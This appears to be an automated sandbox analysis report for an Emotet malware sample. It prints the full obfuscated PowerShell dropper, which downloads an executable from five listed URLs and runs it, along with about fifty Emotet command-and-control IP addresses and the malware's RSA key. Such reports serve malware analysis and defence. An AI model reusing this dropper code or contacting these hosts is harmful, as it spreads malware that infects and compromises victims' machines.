1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

General
Target

1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

Filesize

N/A

Completed

25-12-2019 07:03

Score
10 /10
MD5

N/A

SHA1

N/A

SHA256

1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

Malware Config

Extracted

Language ps1
Source $Ofhrfbpxq='Hgafgjjz';$Oaxlulvxlwdl = '973';$Fpimrxaqe='Qcvwngjdrkwl';$Mummiwdwrbefl=$env:userprofile+'\'+$Oaxlulvxlwdl+'.exe';$Urfmtmjvj='Jskswzwpmqyk';$Heomewlzv=.('ne'+'w-objec'+'t') nET.WeBClieNT;$Uhitdojkc='http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/*http://kaplanforklift.com/web_map/PmTuIEQ/*http://londontravel.com.ar/brc/HsGpuPR/*https://leavenworthrental.com/calendar/aoo-ue7-653740/*http://lareserva.com.py/aloja/AOISroJmq/'."Spl`it"('*');$Dqwtuievhxfvd='Lusueenykukav';foreach($Kcrhkpvkryfca in $Uhitdojkc){try{$Heomewlzv."d`oWnlo`A`DFile"($Kcrhkpvkryfca, $Mummiwdwrbefl);$Whwqqvncoso='Nmbwlqbvfp';If ((&('Get'+'-Item') $Mummiwdwrbefl)."L`EnGTH" -ge 24250) {[Diagnostics.Process]::"STA`RT"($Mummiwdwrbefl);$Rlyjiivraxz='Cyrdcqrclxto';break;$Ytqsqzaeb='Jfstmocir'}}catch{}}$Dbmpanfn='Tdwykfiotxwn'
URLs
exe.dropper

http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/

exe.dropper

http://kaplanforklift.com/web_map/PmTuIEQ/

exe.dropper

http://londontravel.com.ar/brc/HsGpuPR/

exe.dropper

https://leavenworthrental.com/calendar/aoo-ue7-653740/

exe.dropper

http://lareserva.com.py/aloja/AOISroJmq/

Extracted

Family emotet
C2

85.100.122.211:80

78.189.165.52:8080

88.248.140.80:80

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

96.234.38.186:8080

178.134.1.238:80

212.129.14.27:8080

78.186.102.195:80

66.229.161.86:443

190.17.94.108:443

91.117.31.181:80

119.57.36.54:8080

37.59.24.25:8080

200.41.121.69:443

217.181.139.237:443

86.70.224.211:80

216.75.37.196:8080

182.176.116.139:995

138.197.140.163:8080

187.250.92.82:80

82.146.55.23:7080

92.16.222.156:80

91.117.131.122:80

58.185.224.18:80

189.225.211.171:443

201.196.15.79:990

72.27.212.209:8080

100.38.11.243:80

190.161.67.63:80

128.92.54.20:80

158.69.167.246:8080

181.46.176.38:80

176.58.93.123:80

105.209.235.113:8080

67.254.196.78:443

190.47.236.83:80

192.210.217.94:8080

192.241.220.183:8080

191.100.24.201:50000

41.190.148.90:80

46.105.128.215:8080

185.192.75.240:443

172.104.70.207:8080

190.171.135.235:80

46.105.131.68:8080

72.51.153.27:80

221.154.59.110:80

rsa_pubkey.plain
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMqZMACZDzcRXuSnj2OI8LeIYKrbUIXL faUgIJPwYd305HnaBS2AfA0R+oPxT32r+3BbayI3KguqAn3E+rbwtLhqhOXOlTnY 7yvG4ufmwCCkRzc6Sq8baToxmd6y523AIQIDAQAB -----END PUBLIC KEY-----
Signatures

Filter: None

    Processes
    Network
    Replay Monitor
    00:00 00:00
    Downloads
    • C:\Users\Admin\973.exe

    • C:\Users\Admin\973.exe

    • C:\Users\Admin\973.exe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

    • memory/4672-10-0x00000000006D0000-0x00000000006E7000-memory.dmp

    • memory/4740-13-0x00000000007E0000-0x00000000007F7000-memory.dmp

    • memory/4740-14-0x0000000000400000-0x00000000004AA000-memory.dmp